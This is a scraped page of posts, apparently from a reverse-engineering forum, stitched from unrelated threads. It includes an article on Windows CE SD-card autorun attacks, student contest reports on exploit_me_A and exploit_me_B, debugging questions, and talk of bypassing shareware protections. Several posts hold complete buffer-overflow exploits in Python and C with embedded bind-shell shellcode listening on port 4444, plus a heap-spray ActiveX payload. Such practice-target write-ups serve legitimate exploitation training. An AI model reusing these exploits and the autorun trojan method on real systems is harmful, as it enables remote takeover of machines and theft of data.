|
[Original] A method of implementing an AutoRun program on the Windows CE platform
Something this old is still called original?

http://www.informit.com/guides/content.aspx?g=security&seqNum=91

Windows Mobile Autorun
Last updated Nov 25, 2004.

Almost any user, from the most experienced to the complete beginner, knows that when you place a game or application CD in the computer it will automatically launch a program that allows you to interact with the data on the disk. This is a result of a magical concept known as the autorun. The autorun has some definite advantages. It simplifies the installation routine by automating the necessary steps to unpack and execute files on the inserted media. By doing this, the user is kept at an abstract level from the actual data, which is arguably a good thing for many of the computer users in the world. In general, the more the computer automagically operates, the happier the user.

Unfortunately, the simple fact that an autorun process executes a program WITHOUT user interaction is a security nightmare. There is no guarantee that the programs processed by the autorun are actually safe. They could just as easily contain malicious code as they could the launcher for Doom 3. Not to mention the program executed by the autorun may run hidden and give no indication it has executed. This is where the true danger lies. To compound the autorun threat even more, CD-ROMs are not the only form of media that can automatically trigger a program to launch. External hard drives, USB thumb drives, DVDs, and more can elicit a program execution. So, thanks to the combination of providing the end user with a brainless computer experience with the increasingly connected and integrated computer, we now have yet another vector by which viruses, trojans, and other forms of malware can be transmitted. Oh, and all this not only applies to the desktop PC, but it also applies to mobile devices, such as PDAs and cell phones.

The PDA Threat

The PDA is a great tool. However, it is one of the most highly underestimated computer devices on the market. Most people see a PDA and think of a digital day timer. They recognize it is a mini-computer of sorts, but fail to realize that though the size of the device might be small, the computing power contained inside is basically the same as a computer purchased in 1996-1998, and in some cases more powerful. In today's PDA, you can find up to 256MB of built-in memory, a 624MHz processor, built-in 802.11 & Bluetooth wireless connectivity, plus the ability to plug in external drives, run multiple operating systems, and more. While the resources available on the PDA speak to their potential, the programs these devices can run further illustrate their power. Word, Excel, games, PowerPoint, FTP servers, web servers, email servers, full ssh daemons and more run on these devices. In fact, with the Familiar Linux operating system installed, it is hard to tell a PDA from a regular computer when connected remotely (granted data space, memory allocation, and other hardware specifics will give it away to the curious user).

With all this power and storage ability, an attacker may consider the PDA a target too good to pass up. The question is then, how can an attacker gain access to and install any malicious programs that can help achieve their goal. This is where the power of the autorun can come in handy. To illustrate, how often do you see a PDA user on a subway or in a coffee shop? What would happen if you sat next to this user, pulled out your PDA and started up a conversation about how your PDA rocks. Next pull out your Atari games SD card, show the victim the games your PDA can play, and then offer it to them to try. Congratulations, you now own their PDA. What the victim didn't realize is that when the SD card was inserted into the PDA, it automatically executed a file on the PDA that placed a trojan/backdoor in their startup folder, replaced their keyboard with a version that logs everything typed, and copied out everything in their My Documents folder to the SD card. All this by simply inserting the innocent-looking SD card into their PDA.

The Detailed Threat

Autorun on a PDA is not as simple to execute as it is on a desktop PC. As per the MSDN, each major brand of PDA processor is associated with a particular numerical value as defined by the winnt.h file. The number is then used as a folder naming convention, in which that processor would expect to find its personal executable. This is due to the simple fact that each processor understands a different assembly language, which means a program compiled for a StrongARM will not execute on a MIPS processor. The following list provides you with the association table.

HITACHI_SH3    10003  // Windows CE
HITACHI_SH3E   10004  // Windows CE
HITACHI_SH4    10005  // Windows CE
MOTOROLA_821     821  // Windows CE
SH3              103  // Windows CE
SH4              104  // Windows CE
STRONGARM       2577  // Windows CE - 0xA11
ARM720          1824  // Windows CE - 0x720
ARM820          2080  // Windows CE - 0x820
ARM920          2336  // Windows CE - 0x920
ARM_7TDMI      70001

In other words, if you obtain a SD card, create this folder structure on the card, and drop a file called AUTORUN.exe inside each folder that is compiled for the appropriate processor, you can be fairly certain your AUTORUN program will be executed. To make it even more simple, the folder 2577 covers all versions of the ARM processor, from the XScale used in the newest releases from Dell and HP, to the older StrongARM used in the original iPAQs.

When the media card is inserted, the autorun.exe file is actually copied to the \Windows directory on the PDA. It is then 'installed' (i.e. executed). When the media card is removed, the program is 'uninstalled', and then deleted from the \Windows folder. This has several indirect effects. One, your PDA must have the memory space needed for this program to launch, and there must not be another 'autorun.exe' program in the \Windows startup folder or it will be deleted.

To demonstrate, we created the following simple program that can easily be placed on a SD card. This program can be compiled by placing the autorun.s file, make.bat file, two programs from the EVC++ package named armasm.exe and link.exe, and coredll.lib into a folder. Then double click on make.bat and autorun.s should compile and create two new files; autorun.obj and autorun.exe. Place the autorun.exe file in a folder named 2577 on your SD card, remove it and reinsert the card. You should be greeted with a popup box similar to the one in figure 10.

Make.bat:

```bat
armasm.exe autorun.s
link.exe coredll.lib /entry:"start" /subsystem:windowsce /machine:arm autorun.obj
pause
```

autorun.s:

```armasm
        IMPORT  MessageBoxW         ; Calls MessageBox function
        IMPORT  ExitThread          ; Calls ExitThread function
        EXPORT  start               ; Exports start code
        AREA    .text, CODE
start
        eor     R0, R0, R0          ; Sets 1st parameter = 0 (no owner window)
        ldr     R1, =message        ; Sets 2nd parameter = message
        ldr     R2, =msgtit         ; Sets 3rd parameter = msgtit
        mov     R3, #0              ; Sets 4th parameter = MB_OK
        eor     R4, R4, R4          ; Sets 5th parameter = 0
        bl      MessageBoxW         ; Calls message box function
        eor     R0, R0, R0          ; Sets R0 = 0
        bl      ExitThread          ; Calls ExitThread
        ALIGN
message dcb     "A",0,"u",0,"t",0,"o",0,"r",0,"u",0,"n",0,0,0   ; UTF-16LE "Autorun"
msgtit  dcb     "A",0,"u",0,"t",0,"o",0,"r",0,"u",0,"n",0,0,0   ; UTF-16LE "Autorun"
        END
```
|
|
[Original] exploit_me_B overflow code
Submitter's Pediy ID: hahar
Occupation: (student, programmer, security expert, hacking enthusiast, other?) Student

Vulnerability location:
I used the ComRaider included in the materials to locate it, filtered for the crash whose Exception Address is 41414141, and debugged it manually. ComRaider's test result shows the suspect function as:

```
prototype = "Sub LoadPage ( ByVal URL As String , ByVal x As Long , ByVal y As Long , ByVal Zoom As Single )"
memberName = "LoadPage"
progid = "ppp2Lib.T_ppp01"
argCount = 4
arg1=String(1044, "A")
arg2=1
arg3=1
arg4=1
```

Using the method from the exploit_me_A report to determine the hundreds, tens and units digits, I found that a first argument of length 260 exactly overwrites EIP.

Vulnerability description and impact analysis:

```asm
.text:10013DC0 ; =============== S U B R O U T I N E =======================================
.text:10013DC0
.text:10013DC0 ;
.text:10013DC0
.text:10013DC0 sub_10013DC0 proc near             ; CODE XREF: sub_10009740+38 p
.text:10013DC0                                    ; sub_10012D10+8F p
.text:10013DC0
.text:10013DC0 var_10C = byte ptr -10Ch
.text:10013DC0 var_108 = dword ptr -108h
.text:10013DC0 var_104 = dword ptr -104h
.text:10013DC0 String  = byte ptr -100h
.text:10013DC0 arg_0   = dword ptr  4
.text:10013DC0 arg_4   = dword ptr  8
.text:10013DC0
.text:10013DC0     sub     esp, 10Ch              ; open a 10Ch-byte buffer
.text:10013DC6     mov     edx, ecx
.text:10013DC8     or      ecx, 0FFFFFFFFh
.text:10013DCB     xor     eax, eax
.text:10013DCD     push    ebx
.text:10013DCE     push    esi
.text:10013DCF     push    edi                    ; three pushes, ESP-0C
.text:10013DD0     mov     edi, [esp+120h]
.text:10013DD7     repne scasb
.text:10013DD9     not     ecx
.text:10013DDB     sub     edi, ecx
.text:10013DDD     lea     ebx, [esp+18h]         ; copy destination starts at ESP+18h, holds at most 10C+0Ch-18h = 100h bytes
.text:10013DE1     mov     eax, ecx
.text:10013DE3     mov     esi, edi               ; ESI points to Buffer
.text:10013DE5     mov     edi, ebx
.text:10013DE7     shr     ecx, 2
.text:10013DEA     rep movsd                      ; the overflow happens here
.text:10013DEC     mov     ecx, eax
.text:10013DEE     mov     eax, [edx+3F94h]
.text:10013DF4     and     ecx, 3
.text:10013DF7     cmp     eax, 1
.text:10013DFA     rep movsb
```

Disassembling the control with IDA, the vulnerable code is at 10013DC0. The string copy never checks the length of the source string, and the destination space is only 10C+0Ch-18h = 100h bytes, so when the first argument is 260 characters long it exactly overwrites EIP.

Shellcode description
The shellcode is taken from the calculator-launching shellcode provided on the http://metasploit.com site.
Please state the shellcode's origin: original, modified, or cited.
For original, give development notes.
For modified, give modification notes, cite the source and attach the cited code.
For cited, give a functional description, cite the source and attach the cited code.

```javascript
unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
```

Exploit run screenshot
After opening LoadPage.html, the calculator program runs.

Stability and generality argument
Heap spray is used to fill memory with many blocks of the form nop+shellcode; on overflow EIP is overwritten with 0x0d0d0d0d, where the instructions are in nop+shellcode form, so execution is not limited by the operating system version and generality is good.

Innovation argument (optional)
At first I tried to exploit this vulnerability with the traditional JMP ESP method, but found that a large amount of data in memory had been modified. This is the OllyDbg memory screenshot: you can see the original JMPESP = "\x12\x45\xfa\x7f" was modified to "\x12\x45\xA8\xB2"; hence the generic and stable HeapSpray technique used in ActiveX control exploitation was adopted.
|
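Added example (my code, not part of the report): the copy pattern of sub_10013DC0 rendered in C from the listing's own constants, beside a bounded version that refuses input that would not fit, so a 260-byte URL is rejected instead of reaching the saved return address. The `bounded_copy_rejects` helper and its 1044-byte input size are assumptions taken from the ComRaider call above.

```c
#include <string.h>

/* Frame constants taken from the listing above. */
#define FRAME_SIZE      0x10C   /* sub esp, 10Ch        */
#define PUSHED_REGS     0x0C    /* push ebx / esi / edi */
#define BUF_OFFSET      0x18    /* lea ebx, [esp+18h]   */
#define STRING_BUF_SIZE (FRAME_SIZE + PUSHED_REGS - BUF_OFFSET)   /* 0x100 */

/* Input length that reaches and covers the 4-byte saved return address. */
size_t bytes_to_overwrite_eip(void)
{
    return STRING_BUF_SIZE + 4;   /* 0x100 + 4 = 260, as the report found */
}

/* The vulnerable shape: the only length involved is the source's own
 * (repne scasb / not ecx); rep movsd then rep movsb copy all of it. */
void copy_unchecked(char *dst, const char *src)
{
    size_t len = strlen(src);
    size_t dwords = len & ~(size_t)3;
    memcpy(dst, src, dwords);                      /* rep movsd */
    memcpy(dst + dwords, src + dwords, len & 3);   /* rep movsb */
}

/* Bounded replacement: scan no further than dst_size and refuse anything
 * that does not fit together with its terminator. Returns 0 or -1. */
int copy_bounded(char *dst, size_t dst_size, const char *src)
{
    size_t len = 0;
    while (len < dst_size && src[len] != '\0')
        len++;
    if (len >= dst_size)
        return -1;              /* too long: nothing is copied */
    memcpy(dst, src, len);
    dst[len] = '\0';
    return 0;
}

/* Constructed check input: n bytes of 'A', like ComRaider's String(n, "A").
 * Returns 1 if the bounded copy rejects it, 0 if it accepts, -1 if n > 1044. */
int bounded_copy_rejects(size_t n)
{
    char src[1044 + 1];
    char dst[STRING_BUF_SIZE];
    if (n > 1044)
        return -1;
    memset(src, 'A', n);
    src[n] = '\0';
    return copy_bounded(dst, sizeof dst, src) == -1;
}
```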
|
[Original] exploit_me_A exploit
Thanks, uploaded! |
|
[Original] exploit_me_A exploit
There is no attachment upload function, so images and Word documents cannot be submitted. |
|
[Original] exploit_me_A exploit
Exploit_me_A.exe analysis report
Submitter's Pediy ID: hahar
Occupation: (student, programmer, security expert, hacking enthusiast, other?) Student

1. PE analysis
After getting the program, I knew from its description that it is a server program, so I ran it directly and then used Process Explorer to see which port Exploit_me_A.exe listens on, as shown in Figure 1:
The program listens on port 7777, so next I used a python script to send a string of As and see how the server reacts:

```python
#!/usr/bin/env python
import socket

host = "127.0.0.1"
port = 7777

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print shellcode
buffer = "A" * 10
# connect, send and read the echo as described below (the status print
# lines of the original post were truncated and are not reproduced)
s.connect((host, port))
s.send(buffer)
print s.recv(1024)
s.close()
```

The server returned the input data, so the preliminary conclusion is that it is an echo program: whatever you send, it sends back.

2. Vulnerability description
With 10 As the program did not overflow; gradually increasing the number of As, when it reached 1000 the cdb debugger reported an exception (PS: cdb is included in the Windows Debugging Tools package; `cdb -iae` sets cdb as the exception-handling debugger).
From this we can see that the server program raises an exception while handling user input, i.e. it overflows; the debugger shows it executing 41414141, obviously the As we sent. The next step is to pinpoint the overflow point. One can use bisection (testing with lengths 500, 250, 125) or the hundreds/tens/units locating method. The second method is used here.
Modify the python program:

```python
buffer = ""
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 100
```

From the result, the character "C" overwrote EIP, so the overflow length is between 200 and 300; continue by locating the tens digit:

```python
buffer = "a" * 200
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 10
```

The debugger shows character A overwrote EIP, so the overwrite length is between 200 and 210; locate the units digit the same way:

```python
buffer = "a" * 200
li = ["A","B","C","D","E","F","G","H","I","J"]
for ch in li:
    buffer += ch * 1
```

From the result, bytes 201~204 overwrote EIP. Now the exploit can be constructed.
Buffer = A*200 + JMPESP + NOP*20 + Shellcode
Here you can see I used 20 NOPs; in fact it only needs to be larger than the number subtracted on function return, and NOP instructions do not affect shellcode execution. For JMPESP I used the JMPESP that is generic on Chinese platforms, JMPESP = "\x12\x45\xFA\x7F".

3. Shellcode functionality
I'm lazy, so I generated it directly from the http://metasploit.com:55555/PAYLOADS?FILTER=win32 site: I chose windows bind shell, producing a shellcode that listens on port 4444.

4. Stability and generality
Since the JMPESP address used in the program applies to all Chinese operating systems, and the shellcode locates API addresses dynamically, it has good stability and generality.

5. Screenshot of the exploit running successfully
You can see that port 4444 is listening.

6. Exploit

```python
#!/usr/bin/env python
import socket

host = "127.0.0.1"
port = 7777
JMPESP = "\x12\x45\xFA\x7F"
# listens on port 4444
shellcode = "\x33\xc9\x83\xe9\xb0\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\xbe"
shellcode += "\x6b\xb2\x91\x83\xeb\xfc\xe2\xf4\x42\x01\x59\xdc\x56\x92\x4d\x6e"
shellcode += "\x41\x0b\x39\xfd\x9a\x4f\x39\xd4\x82\xe0\xce\x94\xc6\x6a\x5d\x1a"
shellcode += "\xf1\x73\x39\xce\x9e\x6a\x59\xd8\x35\x5f\x39\x90\x50\x5a\x72\x08"
shellcode += "\x12\xef\x72\xe5\xb9\xaa\x78\x9c\xbf\xa9\x59\x65\x85\x3f\x96\xb9"
shellcode += "\xcb\x8e\x39\xce\x9a\x6a\x59\xf7\x35\x67\xf9\x1a\xe1\x77\xb3\x7a"
shellcode += "\xbd\x47\x39\x18\xd2\x4f\xae\xf0\x7d\x5a\x69\xf5\x35\x28\x82\x1a"
shellcode += "\xfe\x67\x39\xe1\xa2\xc6\x39\xd1\xb6\x35\xda\x1f\xf0\x65\x5e\xc1"
shellcode += "\x41\xbd\xd4\xc2\xd8\x03\x81\xa3\xd6\x1c\xc1\xa3\xe1\x3f\x4d\x41"
shellcode += "\xd6\xa0\x5f\x6d\x85\x3b\x4d\x47\xe1\xe2\x57\xf7\x3f\x86\xba\x93"
shellcode += "\xeb\x01\xb0\x6e\x6e\x03\x6b\x98\x4b\xc6\xe5\x6e\x68\x38\xe1\xc2"
shellcode += "\xed\x38\xf1\xc2\xfd\x38\x4d\x41\xd8\x03\xa3\xcd\xd8\x38\x3b\x70"
shellcode += "\x2b\x03\x16\x8b\xce\xac\xe5\x6e\x68\x01\xa2\xc0\xeb\x94\x62\xf9"
shellcode += "\x1a\xc6\x9c\x78\xe9\x94\x64\xc2\xeb\x94\x62\xf9\x5b\x22\x34\xd8"
shellcode += "\xe9\x94\x64\xc1\xea\x3f\xe7\x6e\x6e\xf8\xda\x76\xc7\xad\xcb\xc6"
shellcode += "\x41\xbd\xe7\x6e\x6e\x0d\xd8\xf5\xd8\x03\xd1\xfc\x37\x8e\xd8\xc1"
shellcode += "\xe7\x42\x7e\x18\x59\x01\xf6\x18\x5c\x5a\x72\x62\x14\x95\xf0\xbc"
shellcode += "\x40\x29\x9e\x02\x33\x11\x8a\x3a\x15\xc0\xda\xe3\x40\xd8\xa4\x6e"
shellcode += "\xcb\x2f\x4d\x47\xe5\x3c\xe0\xc0\xef\x3a\xd8\x90\xef\x3a\xe7\xc0"
shellcode += "\x41\xbb\xda\x3c\x67\x6e\x7c\xc2\x41\xbd\xd8\x6e\x41\x5c\x4d\x41"
shellcode += "\x35\x3c\x4e\x12\x7a\x0f\x4d\x47\xec\x94\x62\xf9\x4e\xe1\xb6\xce"
shellcode += "\xed\x94\x64\x6e\x6e\x6b\xb2\x91"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
#print shellcode
#buffer = "a"*200
#li = ["A","B","C","D","E","F","G","H","I","J"]
#for ch in li:
#    buffer += ch *1
#print buffer
buffer = "A" * 200 + JMPESP + "\x90" * 20 + shellcode
#buffer = "A" * 1000
# connect and send as described above (the status print lines of the
# original post were truncated and are not reproduced)
s.connect((host, port))
s.send(buffer)
s.close()
```
|
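Added example (my code, not the report's): the hundreds/tens/units narrowing above written as one loop, run against a constructed model of the echo server rather than the real binary, so the 0-based offset of the saved return address is read off the EIP value the debugger reports. It generalizes the three hand-built buffers to any offset below 1000; `echo_server_model` and its default offset of 200 are assumptions matching the report's 201~204 finding.

```python
import struct

LETTERS = b"ABCDEFGHIJ"   # one letter per digit value 0..9, as in the report
FILLER = b"a"

def digit_probe(prefix_len, width):
    """prefix_len filler bytes, then A..J each repeated width times
    (width 100 / 10 / 1 gives the hundreds / tens / units probes)."""
    return FILLER * prefix_len + b"".join(bytes([c]) * width for c in LETTERS)

def digit_from_eip(eip):
    """Digit encoded by the lowest byte of EIP, which is the first of the four
    overwriting bytes (little-endian); None if it is not a probe letter."""
    idx = LETTERS.find(bytes([eip & 0xFF]))
    return None if idx < 0 else idx

def locate_return_offset(crash_eip):
    """0-based offset of the saved return address, narrowed one digit at a
    time. crash_eip(buf) returns the EIP value observed after sending buf."""
    offset = 0
    for width in (100, 10, 1):
        digit = digit_from_eip(crash_eip(digit_probe(offset, width)))
        if digit is None:
            return None          # no probe letter reached EIP
        offset += digit * width
    return offset

def echo_server_model(buf, ret_offset=200):
    """Constructed stand-in for Exploit_me_A (not the real binary): the four
    bytes at ret_offset land in EIP, short reads pad with 0, and a buffer that
    does not reach the slot returns an ordinary-looking code address."""
    if len(buf) <= ret_offset:
        return 0x00401000
    return struct.unpack("<I", buf[ret_offset:ret_offset + 4].ljust(4, b"\0"))[0]
```

With the default model the three probes reproduce the report's result: EIP reads "CCCC", then "AAAA", then "ABCD", giving offset 200, which is why the final buffer starts with 200 bytes of padding.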
|
[Original] A question about an exploit?
The cause is indeed rather odd, but after I changed jmp_back a bit the jump succeeded; I haven't figured out the reason yet. Below is the test code.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <winsock2.h>
#pragma comment(lib, "Ws2_32")

int sock;
//char jmp_2000esp[] = "\x28\x7f\xe7\x77";
char jmp_esp[] = "\x12\x45\xFa\x7f";
char buffer[1024];
char jmp_back[] = "\xb9\x41\x41\x41\x25\xc1\xe9\x14\x2b\xe1\xff\xe4";
char shellcode[] =   // listens on port 4444
"\xeb\x10\x5b\x4b\x33\xc9\x66\xb9\x23\x01\x80\x34\x0b\xf8\xe2\xfa"
"\xeb\x05\xe8\xeb\xff\xff\xff\x11\x01\xf8\xf8\xf8\xa7\x9c\x59\xc8"
"\xf8\xf8\xf8\x73\xb8\xf4\x73\x88\xe4\x55\x73\x90\xf0\x73\x0f\x92"
"\xfb\xa1\x10\x61\xf8\xf8\xf8\x1a\x01\x90\xcb\xca\xf8\xf8\x90\x8f"
"\x8b\xca\xa7\xac\x07\xee\x73\x10\x92\xfd\xa1\x10\x78\xf8\xf8\xf8"
"\x1a\x01\x79\x14\x68\xf9\xf8\xf8\xac\x90\xf9\xf9\xf8\xf8\x07\xae"
"\xf4\xa8\xa8\xa8\xa8\x92\xf9\x92\xfa\x07\xae\xe8\x73\x20\xcb\x38"
"\xa8\xa8\x90\xfa\xf8\xe9\xa4\x73\x34\x92\xe8\xa9\xab\x07\xae\xec"
"\x92\xf9\xab\x07\xae\xe0\xa8\xa8\xab\x07\xae\xe4\x73\x20\x90\x9b"
"\x95\x9c\xf8\x75\xec\xdc\x7b\x14\xac\x73\x04\x92\xec\xa1\xcb\x38"
"\x71\xfc\x77\x1a\x03\x3e\xbf\xe8\xbc\x06\xbf\xc4\x06\xbf\xc5\x71"
"\xa7\xb0\x71\xa7\xb4\x71\xa7\xa8\x75\xbf\xe8\xaf\xa8\xa9\xa9\xa9"
"\x92\xf9\xa9\xa9\xaa\xa9\x07\xae\xfc\xcb\x38\xb0\xa8\x07\xae\xf0"
"\xa9\xae\x73\x8d\xc4\x73\x8c\xd6\x80\xfb\x0d\xae\x73\x8e\xd8\xfb"
"\x0d\xcb\x31\xb1\xb9\x55\xfb\x3d\xcb\x23\xf7\x46\xe8\xc2\x2e\x8c"
"\xf0\x39\x33\xff\xfb\x22\xb8\x13\x09\xc3\xe7\x8d\x1f\xa6\x73\xa6"
"\xdc\xfb\x25\x9e\x73\xf4\xb3\x73\xa6\xe4\xfb\x25\x73\xfc\x73\xfb"
"\x3d\x53\xa6\xa1\x3b\x10\xfa\x07\x07\x07\xca\x8c\x69\xf4\x31\x44"
"\x5e\x93\x77\x0a\xe0\x99\xc5\x92\x4c\x78\xd5\xca\x80\x26\x9c\xe8"
"\x5f\x25\xf4\x67\x2b\xb3\x49\xe6\x6f\xf9";

int main(int argc, char *argv[])
{
    struct sockaddr_in server;
    WSADATA ws;

    // NOP sled, shellcode at 280, return address at 604, jmp_back at 608
    memset(buffer, 0x90, 1024);
    memcpy(&buffer[280], shellcode, 314);
    //memcpy(&buffer[604], jmp_2000esp, 4);
    memcpy(&buffer[604], jmp_esp, 4);
    memcpy(&buffer[608], jmp_back, 12);

    WSAStartup(MAKEWORD(2, 2), &ws);
    sock = socket(AF_INET, SOCK_STREAM, 0);
    memset(&server, 0, sizeof(server));
    server.sin_family = AF_INET;
    server.sin_port = htons(3764);
    server.sin_addr.s_addr = inet_addr("127.0.0.1");
    connect(sock, (struct sockaddr *)&server, sizeof(server));
    send(sock, buffer, sizeof(buffer), 0);
    closesocket(sock);
    WSACleanup();
    return 0;
}
```
|
|
[Original] A question about an exploit?
I understand what you mean; in theory there is no problem. I asked you to post the code so I could debug it and see whether the data in memory changes. |
|
[Original] A question about an exploit?
Post the code; one debugging session will show the problem. |
|
[Repost] IDA introduces full decompilation (to source code, yes)
A demo is already out: http://hexblog.com/decompilation/video/vd1.html |
|
Assembly code generated under VC++ 6.0, can someone explain it to me
What the OP posted is exactly what VC generates; the corresponding C code is shown alongside the assembly. |
|
How do I save the results of OllyDbg's "Run trace"? [Help]
Done, thanks for the moderator's pointers! |
|
Problem: mouse does not respond after installing SoftICE on XP?
The problem may lie in your operating system version; installing SoftICE on the Tomato Garden (番茄花园) XP+SP2 build seems to have this problem. |
|
[Original] Analysis examples of common self-checks
It is this version; don't be misled by the surface behaviour. Log in with the "primary Learner" user and then click "New lesson": you can see nothing happens, and the status bar reports "运行错误:Ver7.05 TApplication-> Access violation at address 004F1DD3 in moudule". You can check the unpacked version with PEiD, and you will find the MD5 algorithm. |
|
[Original] Analysis examples of common self-checks
I suggest the OP look at the latest version of "CJC好玩背单词"; here we only discuss unpacking, not cracking (the early versions were not packed), thanks! |
|
SmartCheck, where are you? I searched the entire Internet and still couldn't find it.....
This also seems to be an unregistered version. |
|
[Original] Analysis examples of common self-checks
For a Delphi program you can try using eXeScope to modify the Enabled item of the corresponding control in the RC data, changing FALSE to TRUE. The menu is enabled; it's just that after clicking it, the status bar reports an exception. Last night I traced it with the first method for a long time and still couldn't get it. |